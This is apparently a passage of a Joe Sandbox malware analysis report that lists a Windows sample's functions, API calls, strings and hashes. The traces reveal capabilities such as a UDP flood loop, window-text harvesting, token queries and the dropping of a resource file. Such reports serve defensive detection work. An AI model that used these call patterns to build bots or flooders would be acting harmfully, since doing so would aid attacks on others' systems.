??2@YAPAXI@Z.MSVCRT(?), ref: 10012832
GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 10012854
??2@YAPAXI@Z.MSVCRT(00000100), ref: 10012876
LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000100,?,00000104,?), ref: 100128A6

Strings

explorer.exe, xrefs: 100127A9

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@Token$InformationOpenProcess$AccountCreateFirstLookupProcess32SnapshotToolhelp32_strcmpi
String ID: explorer.exe
API String ID: 2062827286-3187896405
Opcode ID: 6ae1be46aa6dd37aa1cb4fad1e5e9fefe03301e8bbe20af14b7827fca2362f4d
Instruction ID: 3c6e58a02f97abc338737f091e25ee4c367b19baec1748f45827f9b92fdf04fa
Opcode Fuzzy Hash: 6ae1be46aa6dd37aa1cb4fad1e5e9fefe03301e8bbe20af14b7827fca2362f4d
Instruction Fuzzy Hash: 17411AB1D01228AFDB10DF95DC85BEEBBB9FB48710F10415AF609A7280D7716A84CFA1

Function 1000A830 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 103fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1000A85D

Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000A882
wsprintfA.USER32 ref: 1000A8F7
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000A913
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000A937
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 1000A93E

Strings

XXXXXX, xrefs: 1000A865
Ball\, xrefs: 1000A857

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Resource$Filewsprintf$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWrite
String ID: Ball\$XXXXXX
API String ID: 1973673485-3982136319
Opcode ID: d0285f27527aa3d9f6c94dda95131b8ba6b821462037fccde0d85b55137da151
Instruction ID: 495c6c63232d9b85305b454becab353a6f073e9b30b67b104db98610628649c6
Opcode Fuzzy Hash: d0285f27527aa3d9f6c94dda95131b8ba6b821462037fccde0d85b55137da151
Instruction Fuzzy Hash: 5331F63220070427E728CA74CC55BBB7396EBC4721F544B2DF662972C0DEF4AE088695

Function 00403E31 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E9E
GetStdHandle.KERNEL32(000000F4,00406360,00000000,?,00000000,00000000), ref: 00403F74
WriteFile.KERNEL32(00000000), ref: 00403F7B

Strings

Runtime Error!Program: , xrefs: 00403F04
<program name unknown>, xrefs: 00403EAE
B, xrefs: 00403E3F
Microsoft Visual C++ Runtime Library, xrefs: 00403F4A
..., xrefs: 00403EF0

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: B$...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-92088503
Opcode ID: 1418363ce47fb53e1422872c1821c3fc56e793c3fac4f8efe83855173f2920ce
Instruction ID: e2e7e3b0d966deab652d805934d5b43aed53a7e34c61163c82d84b1dec86f9c2
Opcode Fuzzy Hash: 1418363ce47fb53e1422872c1821c3fc56e793c3fac4f8efe83855173f2920ce
Instruction Fuzzy Hash: 6731E372A002186EDF20EB62DD46F9A77BCAB85704F50047BFA45F60C0DA78EA418A5D

Function 10004BC0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67networksleepthreadCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 10004BD4
socket.WS2_32(00000002,00000002,00000011), ref: 10004BF1
htons.WS2_32 ref: 10004C1A
inet_addr.WS2_32(1007DD2C), ref: 10004C2A
sendto.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000,?,00000010), ref: 10004C59
Sleep.KERNEL32(00000028,?,00000000,?,00000010,00000002), ref: 10004C62
RtlExitUserThread.NTDLL(00000000), ref: 10004C6F

Strings

GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 10004BDA, 10004C53

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ExitSleepStartupThreadUserhtonsinet_addrsendtosocket
String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
API String ID: 3602400006-4039768343
Opcode ID: b7fd58fe7a85b0579cd9239b455f85d4c9d72aaf4c76e786bf3f88592cc7e18c
Instruction ID: 55386a69bf2c1f1f0394aeb8968783278eab3e70afa46589061ef1ece014295f
Opcode Fuzzy Hash: b7fd58fe7a85b0579cd9239b455f85d4c9d72aaf4c76e786bf3f88592cc7e18c
Instruction Fuzzy Hash: 7C1122701053A16BF300DF30CC89B6A3BA4FF89754F00061EF191972E1EBB49C08872A

Function 00404CAB Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403F55,?,Microsoft Visual C++ Runtime Library,00012010,?,00406360,?,004063B0,?,?,?,Runtime Error!Program: ), ref: 00404CBD
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404CD5
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404CE6
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404CF3

Strings

user32.dll, xrefs: 00404CB8
MessageBoxA, xrefs: 00404CCF
GetActiveWindow, xrefs: 00404CE0
GetLastActivePopup, xrefs: 00404CE8

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 65487e5282e3d4811eb732336b9f14f6fc2d01affe1e7d4a2d5ace8b969641ae
Instruction ID: 7a0cc08ec05e3b4d564e92fce98ceeba057a3e0b493a9dfb57db353efca9b8d4
Opcode Fuzzy Hash: 65487e5282e3d4811eb732336b9f14f6fc2d01affe1e7d4a2d5ace8b969641ae
Instruction Fuzzy Hash: E80175B1700211EBD7219FB59C84A2B3AF8ABC4751391043BA602E22A1D6789C66DB6D

Function 1000E1E0 Relevance: 13.7, APIs: 9, Instructions: 205registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E1FA
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000E22C
LocalAlloc.KERNEL32(00000040,?), ref: 1000E28B
malloc.MSVCRT ref: 1000E2CC
malloc.MSVCRT ref: 1000E2D7
RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,?,?), ref: 1000E35E

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: malloc$AllocEnumInfoLocalOpenQueryValue
String ID:
API String ID: 574313380-0
Opcode ID: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
Instruction ID: 2dbc490ccdae4f0339eaf1a45c7cb0cbb32c1b4649a87cd96ed82d0427daa14a
Opcode Fuzzy Hash: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
Instruction Fuzzy Hash: E561BE716083559FD318CF28C884A2BBBE9EBC8790F44492CF68AD3350D671EE05CB92

Function 10068B90 Relevance: 13.6, APIs: 9, Instructions: 105COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068BD8
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068BEE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C08
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C2A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C3A
CloseWindow.USER32(?), ref: 10068C49
CloseHandle.KERNEL32(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C53
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C77
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C8E

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??3@$Close$HandleWindow
String ID:
API String ID: 3237098652-0
Opcode ID: 9de152eaf032b6c019d36165fe0161e4700e84a4955553e3fc30d38c5674a32d
Instruction ID: 47ea1eda927b8dc083e930fae728241aa0dc08fd9b84fd6a3200258ce030e435
Opcode Fuzzy Hash: 9de152eaf032b6c019d36165fe0161e4700e84a4955553e3fc30d38c5674a32d
Instruction Fuzzy Hash: F2416BF5600B409FC724CF69C980816B7FAFF89710B458A2DE1468BB11DB35F948CB91

Function 10012040 Relevance: 13.6, APIs: 9, Instructions: 73stringmemorysleepCOMMON

Download Yara Rule

APIs

GetWindowTextA.USER32(?,?,00000400), ref: 1001206F
IsWindowVisible.USER32(?), ref: 10012076
lstrlen.KERNEL32(?), ref: 1001208F
LocalAlloc.KERNEL32(00000040,00000001), ref: 1001209D
lstrlen.KERNEL32(?), ref: 100120AA
Sleep.KERNEL32(00000001), ref: 100120B3
LocalSize.KERNEL32 ref: 100120BA
LocalReAlloc.KERNEL32(?,?,00000042), ref: 100120C9
lstrlen.KERNEL32(?,?,?,00000042), ref: 100120E0

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Locallstrlen$AllocWindow$SizeSleepTextVisible
String ID:
API String ID: 2862634755-0
Opcode ID: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
Instruction ID: 3dedb17b5f53bc68f4680ffa48498177935556d525806c47c9f4f8922cb1ae20
Opcode Fuzzy Hash: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
Instruction Fuzzy Hash: D1215EB2204355ABE714DF64CC85AAB73E9FB88300F414928FB5697240EBB4E949CB65

Function 10012980 Relevance: 13.6, APIs: 9, Instructions: 66threadstringCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10012992
GetThreadDesktop.USER32(00000000), ref: 10012999
GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129C6
OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 100129D1
GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129FE
lstrcmpiA.KERNEL32(?,?), ref: 10012A0D
SetThreadDesktop.USER32(00000000), ref: 10012A18
CloseDesktop.USER32(00000000), ref: 10012A30
CloseDesktop.USER32(00000000), ref: 10012A33

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
String ID:
API String ID: 3718465862-0
Opcode ID: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
Instruction ID: c967bd72d2f0f6242c0139ef5eee9d5da27d55a5de029f67c8097565ae890da2
Opcode Fuzzy Hash: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
Instruction Fuzzy Hash: B2110871104349ABF310DB60CC4AFDB7799EB88700F000829FB4196191EFB4A94986A2

Function 004051CE Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,0040642C,00000001,00000000,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 0040520D
GetStringTypeA.KERNEL32(00000000,00000001,00406428,00000001,?,?,00000000,00000000,00000001), ref: 00405227
GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 0040525B
MultiByteToWideChar.KERNEL32(oD@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 00405293
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 004052E9
GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 004052FB

Strings

oD@ , xrefs: 00405290

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID: oD@
API String ID: 3852931651-4270158488
Opcode ID: 094cbf9cb636d95a61da7a826cc7b8ee29b3be9263811f6ed0450c6ecd228496
Instruction ID: 4e9507d7fde2c7550347533a2b4aeff6ceb3887050b9cf78e8730f58af229727
Opcode Fuzzy Hash: 094cbf9cb636d95a61da7a826cc7b8ee29b3be9263811f6ed0450c6ecd228496
Instruction Fuzzy Hash: 04416F71640619EFCF209F94DD85DAF3FB8EB08790F10443AF912E6290C37989618FA9

Function 10006310 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92threadnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 10006317
gethostbyname.WS2_32(?), ref: 10006323
inet_ntoa.WS2_32(?), ref: 1000634D
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 100063BB
CloseHandle.KERNEL32(00000000), ref: 100063BE
CreateThread.KERNEL32(00000000,00000000,Function_00005F50,00000000,00000000,00000000), ref: 100063FA

Strings

gfff, xrefs: 100063C8

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
String ID: gfff
API String ID: 772126777-1553575800
Opcode ID: 91b9fa16a84fe6fcd60e97a3d99e1aed4d20b384f66aba2166986545eee1b3ef
Instruction ID: c7197912ff5fd36304896d9e0e4c3c204ad4e708709a044846b952971cfb3809
Opcode Fuzzy Hash: 91b9fa16a84fe6fcd60e97a3d99e1aed4d20b384f66aba2166986545eee1b3ef
Instruction Fuzzy Hash: CD21E1327046155BE328DA389C45B2BB7E3FBC8760F658229FA06E72D4CEF4EC008654

Function 10005E50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92threadnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 10005E57
gethostbyname.WS2_32(?), ref: 10005E63
inet_ntoa.WS2_32(?), ref: 10005E8D
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10005EFB
CloseHandle.KERNEL32(00000000), ref: 10005EFE
CreateThread.KERNEL32(00000000,00000000,Function_00005880,00000000,00000000,00000000), ref: 10005F3A

Strings

gfff, xrefs: 10005F08

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
String ID: gfff
API String ID: 772126777-1553575800
Opcode ID: 2b2e48b9233d71c179e8e4256631f78aef2ad198907d8a616f5f70b0b1f53888
Instruction ID: 4bb7b8ee4ec5a65906e8f0a6ea5f30d081eb742cdef018fe392bcbb4b8c5aab5
Opcode Fuzzy Hash: 2b2e48b9233d71c179e8e4256631f78aef2ad198907d8a616f5f70b0b1f53888
Instruction Fuzzy Hash: A121E1367042555BE328DA389C45B2BB7E2FBC4761F658229FA46E72D0CEF4EC008618

Function 100066F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92threadnetworkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 100066F7
gethostbyname.WS2_32(?), ref: 10006703
inet_ntoa.WS2_32(?), ref: 1000672D
CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 1000679B
CloseHandle.KERNEL32(00000000), ref: 1000679E
CreateThread.KERNEL32(00000000,00000000,10006410,00000000,00000000,00000000), ref: 100067DA

Strings

gfff, xrefs: 100067A8

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
String ID: gfff
API String ID: 772126777-1553575800
Opcode ID: f01e47dce8243ebdbacc13b674b2ed14e172bd6594d26d58a762836b05828d2e
Instruction ID: 58ebadb22f4f2352d4f0c07478b8d6832934a2795fef116bc6cf84ea50f8ad69
Opcode Fuzzy Hash: f01e47dce8243ebdbacc13b674b2ed14e172bd6594d26d58a762836b05828d2e
Instruction Fuzzy Hash: BC21B4367046155BE328DA399C85B1AB7E3FBC8760F658229FA16E72D4CEF4EC048614

Function 10068A70 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(0000000C,?), ref: 10068AA6
??2@YAPAXI@Z.MSVCRT(00019018,0000000C,?), ref: 10068ADA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10068B01
CoInitialize.OLE32(00000000), ref: 10068B0B
CreateWindowExA.USER32(00000000,#32770,1007DE30,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10068B2D
ShowWindow.USER32(00000000,00000000), ref: 10068B38

Strings

#32770, xrefs: 10068B27

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??2@CreateWindow$EventInitializeShow
String ID: #32770
API String ID: 1167904864-463685578
Opcode ID: a8919276c058a7dec2df6c51b7871ff0220c943c339c5ac3a0e52b428adf2aba
